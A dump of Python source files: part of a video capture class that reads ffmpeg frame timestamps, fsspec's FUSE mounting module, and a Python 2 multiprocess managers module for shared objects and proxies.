self.last_frame_data = VideoCapture.FrameData(self.frame_idx, timestamp, frame)
return self.last_frame_data
def retrieve(self):
if self.video_reader == 'opencv':
self.last_frame_data.frame = self.opencv_capture.retrieve()[1]
return self.last_frame_data
def _get_timestamp_for_frame(self, frame_idx) -> float:
if self.video_reader == 'opencv':
# opencv handles offset internally
opencv_ts = self.opencv_capture.get(cv2.CAP_PROP_POS_MSEC) / 1000
self.timestamps.append(opencv_ts)
else:
# wait for timestamp record to be available, normally it available before frame is read
waits = 0
while frame_idx > len(self.timestamps) - 1:
time.sleep(VideoCapture.TIMESTAMP_POLL_INTERVAL)
waits += 1
if waits > VideoCapture.MAX_TIMESTAMP_WAIT:
raise Exception('Error reading video timestamps')
if waits > 0:
logger.debug(f'Waited for frame timestamp for {VideoCapture.TIMESTAMP_POLL_INTERVAL * waits} sec')
return self.timestamps[frame_idx]
def start(self):
if self.video_reader != 'opencv':
format = 'null'
pix_fmt = 'yuv420p' if self.video_reader == 'ffmpeg_yuv' else ('bgr24' if self.video_reader == 'ffmpeg_bgr' else '')
if pix_fmt:
pix_fmt = f'-pix_fmt {pix_fmt}'
format = 'rawvideo'
output = 'pipe:' if self.video_reader != 'opencv' else '-'
# start ffmpeg process
ffmpeg_cmd = f"ffmpeg -y -debug_ts -hide_banner {self.ffmpeg_decoder} -i {self.filename} -copyts -f {format} {pix_fmt} {output}"
self.video_capture = subprocess.Popen(ffmpeg_cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# stderr and stdout are not synchronized, read timestamp data in separate thread
self.ts_reader_thread = threading.Thread(target=self.stream_reader, args=[self.video_capture.stderr])
self.ts_reader_thread.start()
# wait for stream reader thread to fill timestamp list
time.sleep(0.05)
self.started = True
def stream_reader(self, stream):
while not self.stopping:
try:
last_line = stream.readline().decode('ascii')
if not last_line:
break
if not self.stream_data_read:
# read stream offset
m = re.match('.+Duration:.+start: (?P<start>\d*\.?\d*)', last_line)
if m:
self.offset = float(m.group('start'))
logger.info(f'Video start offset is: {self.offset}')
self.stream_data_read = True
m = re.match('^demuxer\+ffmpeg -> ist_index:[0-9].+type:video.+pkt_pts_time:(?P<pkt_pts_time>\d*\.?\d*)', last_line)
if m:
timestamp = float(m.group('pkt_pts_time'))
if timestamp < self.offset:
logger.warning('Unknown behavior: pkt_pts_time is expected to be greater than stream start offset')
timestamp = self.offset
# Some frames are out-of-order by PTS, but returned to output in proper order. This may fail if corresponding debug record wasn't yet fetched when frame was read, but such behavior never observed during testing.
bisect.insort(self.timestamps, timestamp - self.offset)
if 2 < len(self.timestamps) < self.frame_idx + 3:
logger.warning('Don\'t have enough timestamp records to account for out-of-order frames')
self.timestamps = list(sorted(self.timestamps))
if not self.stream_data_read:
# stream data wasn't parsed, no point in searching for it
logger.warning('Unable to parse stream data, start offset set to 0')
self.stream_data_read = True
except:
if not self.stopping:
raise
def release(self):
"""
Stop Ffmpeg instance
@return:
"""
try:
if self.started:
self.stopping = True
self.video_capture.terminate()
if self.opencv_capture is not None:
self.opencv_capture.release()
except:
pass
|
fuse.py
|
import argparse
import logging
import os
import stat
import threading
import time
from errno import EIO, ENOENT
from fuse import FUSE, FuseOSError, LoggingMixIn, Operations
from fsspec import __version__
from fsspec.core import url_to_fs
logger = logging.getLogger("fsspec.fuse")
class FUSEr(Operations):
def __init__(self, fs, path, ready_file=False):
self.fs = fs
self.cache = {}
self.root = path.rstrip("/") + "/"
self.counter = 0
logger.info("Starting FUSE at %s", path)
self._ready_file = ready_file
def getattr(self, path, fh=None):
logger.debug("getattr %s", path)
if self._ready_file and path in ["/.fuse_ready", ".fuse_ready"]:
return {"type": "file", "st_size": 5}
path = "".join([self.root, path.lstrip("/")]).rstrip("/")
try:
info = self.fs.info(path)
except FileNotFoundError:
raise FuseOSError(ENOENT)
data = {"st_uid": info.get("uid", 1000), "st_gid": info.get("gid", 1000)}
perm = info.get("mode", 0o777)
if info["type"] != "file":
data["st_mode"] = stat.S_IFDIR | perm
data["st_size"] = 0
data["st_blksize"] = 0
else:
data["st_mode"] = stat.S_IFREG | perm
data["st_size"] = info["size"]
data["st_blksize"] = 5 * 2 ** 20
data["st_nlink"] = 1
data["st_atime"] = time.time()
data["st_ctime"] = time.time()
data["st_mtime"] = time.time()
return data
def readdir(self, path, fh):
logger.debug("readdir %s", path)
path = "".join([self.root, path.lstrip("/")])
files = self.fs.ls(path, False)
files = [os.path.basename(f.rstrip("/")) for f in files]
return [".", ".."] + files
def mkdir(self, path, mode):
path = "".join([self.root, path.lstrip("/")])
self.fs.mkdir(path)
return 0
def rmdir(self, path):
path = "".join([self.root, path.lstrip("/")])
self.fs.rmdir(path)
return 0
def read(self, path, size, offset, fh):
logger.debug("read %s", (path, size, offset))
if self._ready_file and path in ["/.fuse_ready", ".fuse_ready"]:
return b"ready"
f = self.cache[fh]
f.seek(offset)
out = f.read(size)
return out
def write(self, path, data, offset, fh):
logger.debug("read %s", (path, offset))
f = self.cache[fh]
f.write(data)
return len(data)
def create(self, path, flags, fi=None):
logger.debug("create %s", (path, flags))
fn = "".join([self.root, path.lstrip("/")])
f = self.fs.open(fn, "wb")
self.cache[self.counter] = f
self.counter += 1
return self.counter - 1
def open(self, path, flags):
logger.debug("open %s", (path, flags))
fn = "".join([self.root, path.lstrip("/")])
if flags % 2 == 0:
# read
mode = "rb"
else:
# write/create
mode = "wb"
self.cache[self.counter] = self.fs.open(fn, mode)
self.counter += 1
return self.counter - 1
def truncate(self, path, length, fh=None):
fn = "".join([self.root, path.lstrip("/")])
if length != 0:
raise NotImplementedError
# maybe should be no-op since open with write sets size to zero anyway
self.fs.touch(fn)
def unlink(self, path):
fn = "".join([self.root, path.lstrip("/")])
try:
self.fs.rm(fn, False)
except (IOError, FileNotFoundError):
raise FuseOSError(EIO)
def release(self, path, fh):
try:
if fh in self.cache:
f = self.cache[fh]
f.close()
self.cache.pop(fh)
except Exception as e:
print(e)
return 0
def chmod(self, path, mode):
if hasattr(self.fs, "chmod"):
path = "".join([self.root, path.lstrip("/")])
return self.fs.chmod(path, mode)
raise NotImplementedError
def run(
fs,
path,
mount_point,
foreground=True,
threads=False,
ready_file=False,
ops_class=FUSEr,
):
"""Mount stuff in a local directory
This uses fusepy to make it appear as if a given path on an fsspec
instance is in fact resident within the local file-system.
This requires that fusepy by installed, and that FUSE be available on
the system (typically requiring a package to be installed with
apt, yum, brew, etc.).
Parameters
----------
fs: file-system instance
From one of the compatible implementations
path: str
Location on that file-system to regard as the root directory to
mount. Note that you typically should include the terminating "/"
character.
mount_point: str
An empty directory on the local file-system where the contents of
the remote path will appear.
foreground: bool
Whether or not calling this function will block. Operation will
typically be more stable if True.
threads: bool
Whether or not to create threads when responding to file operations
within the mounter directory. Operation will typically be more
stable if False.
ready_file: bool
Whether the FUSE process is ready. The `.fuse_ready` file will
exist in the `mount_point` directory if True. Debugging purpose.
ops_class: FUSEr or Subclass of FUSEr
To override the default behavior of FUSEr. For Example, logging
to file.
"""
func = lambda: FUSE(
ops_class(fs, path, ready_file=ready_file),
mount_point,
nothreads=not threads,
foreground=foreground,
)
if not foreground:
th = threading.Thread(target=func)
th.daemon = True
th.start()
return th
else: # pragma: no cover
try:
func()
except KeyboardInterrupt:
pass
def main(args):
"""Mount filesystem from chained URL to MOUNT_POINT.
Examples:
python3 -m fsspec.fuse memory /usr/share /tmp/mem
python3 -m fsspec.fuse local /tmp/source /tmp/local \\
-l /tmp/fsspecfuse.log
You can also mount chained-URLs and use special settings:
python3 -m fsspec.fuse 'filecache::zip::file://data.zip' \\
/ /tmp/zip \\
-o 'filecache-cache_storage=/tmp/simplecache'
You can specify the type of the setting by using `[int]` or `[bool]`,
(`true`, `yes`, `1` represents the Boolean value `True`):
python3 -m fsspec.fuse 'simplecache::ftp://ftp1.at.proftpd.org' \\
/historic/packages/RPMS /tmp/ftp \\
-o 'simplecache-cache_storage=/tmp/simplecache' \\
-o 'simplecache-check_files=false[bool]' \\
-o 'ftp-listings_expiry_time=60[int]' \\
-o 'ftp-username=anonymous' \\
-o 'ftp-password=xieyanbo'
"""
class RawDescriptionArgumentParser(argparse.ArgumentParser):
def format_help(self):
usage = super(RawDescriptionArgumentParser, self).format_help()
parts = usage.split("\n\n")
parts[1] = self.description.rstrip()
return "\n\n".join(parts)
parser = RawDescriptionArgumentParser(prog="fsspec.fuse", description=main.__doc__)
parser.add_argument("--version", action="version", version=__version__)
parser.add_argument("url", type=str, help="fs url")
parser.add_argument("source_path", type=str, help="source directory in fs")
parser.add_argument("mount_point", type=str, help="local directory")
parser.add_argument(
"-o",
"--option",
action="append",
help="Any options of protocol included in the chained URL",
)
parser.add_argument(
"-l", "--log-file", type=str, help="Logging FUSE debug info (Default: '')"
)
parser.add_argument(
"-f",
"--foreground",
action="store_false",
help="Running in foreground or not (Default: False)",
)
parser.add_argument(
"-t",
"--threads",
action="store_false",
help="Running with threads support (Default: False)",
)
parser.add_argument(
"-r",
"--ready-file",
action="store_false",
help="The `.fuse_ready` file will exist after FUSE is ready. "
"(Debugging purpose, Default: False)",
)
args = parser.parse_args(args)
kwargs = {}
for item in args.option or []:
key, sep, value = item.partition("=")
if not sep:
parser.error(message="Wrong option: {!r}".format(item))
val = value.lower()
if val.endswith("[int]"):
value = int(value[: -len("[int]")])
elif val.endswith("[bool]"):
value = val[: -len("[bool]")] in ["1", "yes", "true"]
if "-" in key:
fs_name, setting_name = key.split("-", 1)
if fs_name in kwargs:
kwargs[fs_name][setting_name] = value
else:
kwargs[fs_name] = {setting_name: value}
else:
kwargs[key] = value
if args.log_file:
logging.basicConfig(
level=logging.DEBUG,
filename=args.log_file,
format="%(asctime)s %(message)s",
)
class LoggingFUSEr(FUSEr, LoggingMixIn):
pass
fuser = LoggingFUSEr
else:
fuser = FUSEr
fs, url_path = url_to_fs(args.url, **kwargs)
logger.debug("Mounting %s to %s", url_path, str(args.mount_point))
run(
fs,
args.source_path,
args.mount_point,
foreground=args.foreground,
threads=args.threads,
ready_file=args.ready_file,
ops_class=fuser,
)
if __name__ == "__main__":
import sys
main(sys.argv[1:])
|
managers.py
|
#
# Module providing the `SyncManager` class for dealing
# with shared objects
#
# multiprocessing/managers.py
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of author nor the names of any contributors may be
# used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
__all__ = [ 'BaseManager', 'SyncManager', 'BaseProxy', 'Token' ]
#
# Imports
#
import os
import sys
import weakref
import threading
import array
import Queue
from traceback import format_exc
from multiprocess import Process, current_process, active_children, Pool, util, connection
from multiprocess.process import AuthenticationString
from multiprocess.forking import exit, Popen, assert_spawning, ForkingPickler
from multiprocess.util import Finalize, info
try:
from dill import PicklingError
except ImportError:
try:
from cPickle import PicklingError
except ImportError:
from pickle import PicklingError
#
# Register some things for pickling
#
def reduce_array(a):
return array.array, (a.typecode, a.tostring())
ForkingPickler.register(array.array, reduce_array)
view_types = [type(getattr({}, name)()) for name in ('items','keys','values')]
#
# Type for identifying shared objects
#
class Token(object):
'''
Type to uniquely indentify a shared object
'''
__slots__ = ('typeid', 'address', 'id')
def __init__(self, typeid, address, id):
(self.typeid, self.address, self.id) = (typeid, address, id)
def __getstate__(self):
return (self.typeid, self.address, self.id)
def __setstate__(self, state):
(self.typeid, self.address, self.id) = state
def __repr__(self):
return 'Token(typeid=%r, address=%r, id=%r)' % \
(self.typeid, self.address, self.id)
#
# Function for communication with a manager's server process
#
def dispatch(c, id, methodname, args=(), kwds={}):
'''
Send a message to manager using connection `c` and return response
'''
c.send((id, methodname, args, kwds))
kind, result = c.recv()
if kind == '#RETURN':
return result
raise convert_to_error(kind, result)
def convert_to_error(kind, result):
if kind == '#ERROR':
return result
elif kind == '#TRACEBACK':
assert type(result) is str
return RemoteError(result)
elif kind == '#UNSERIALIZABLE':
assert type(result) is str
return RemoteError('Unserializable message: %s\n' % result)
else:
return ValueError('Unrecognized message type')
class RemoteError(Exception):
def __str__(self):
return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if hasattr(func, '__call__'):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
assert isinstance(authkey, bytes)
self.registry = registry
self.authkey = AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.mutex = threading.RLock()
self.stop = 0
def serve_forever(self):
'''
Run the server forever
'''
current_process()._manager_server = self
try:
try:
while 1:
try:
c = self.listener.accept()
except (OSError, IOError):
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
except (KeyboardInterrupt, SystemExit):
pass
finally:
self.stop = 999
self.listener.close()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception, e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop:
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
obj, exposed, gettypeid = id_to_obj[ident]
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception, e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception, e:
send(('#UNSERIALIZABLE', format_exc()))
except Exception, e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
self.mutex.acquire()
try:
result = []
keys = self.id_to_obj.keys()
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
finally:
self.mutex.release()
def number_of_objects(self, c):
'''
Number of shared objects
'''
return len(self.id_to_obj) - 1 # don't count ident='0'
def shutdown(self, c):
'''
Shutdown this process
'''
try:
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
if sys.stdout != sys.__stdout__:
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
util._run_finalizers(0)
for p in active_children():
util.debug('terminating a child process of manager')
p.terminate()
for p in active_children():
util.debug('terminating a child process of manager')
p.join()
util._run_finalizers()
util.info('manager exiting with exitcode 0')
except:
import traceback
traceback.print_exc()
finally:
exit(0)
def create(self, c, typeid, *args, **kwds):
'''
Create a new shared object and return its id
'''
self.mutex.acquire()
try:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
assert len(args) == 1 and not kwds
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
assert type(method_to_typeid) is dict
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
# increment the reference count immediately, to avoid
# this object being garbage collected before a Proxy
# object for it can be created. The caller of create()
# is responsible for doing a decref once the Proxy object
# has been created.
self.incref(c, ident)
return ident, tuple(exposed)
finally:
self.mutex.release()
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
self.mutex.acquire()
try:
self.id_to_refcount[ident] += 1
finally:
self.mutex.release()
def decref(self, c, ident):
self.mutex.acquire()
try:
assert self.id_to_refcount[ident] >= 1
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_obj[ident], self.id_to_refcount[ident]
util.debug('disposing of obj with id %r', ident)
finally:
self.mutex.release()
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle'):
if authkey is None:
authkey = current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
assert self._state.value == State.INITIAL
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
assert self._state.value == State.INITIAL
if initializer is not None and not hasattr(initializer, '__call__'):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
self._process.join(timeout)
def _debug_info(self):
'''
Return some info about the servers shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=0.2)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
address = property(lambda self: self._address)
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in method_to_typeid.items():
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True):
BaseProxy._mutex.acquire()
try:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
finally:
BaseProxy._mutex.release()
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
if authkey is not None:
self._authkey = AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
Try to call a method of the referrent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception, e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception, e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if Popen.thread_is_spawning():
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %s>' % \
(type(self).__name__, self._token.typeid, '0x%x' % id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
If possible the shared object is returned, or otherwise a proxy for it.
'''
server = getattr(current_process(), '_manager_server', None)
if server and server.address == token.address:
return server.id_to_obj[token.id][0]
else:
incref = (
kwds.pop('incref', True) and
not getattr(current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec '''def %s(self, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth) in dic
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = self.__dict__.items()
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return 'Namespace(%s)' % str.join(', ', temp)
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
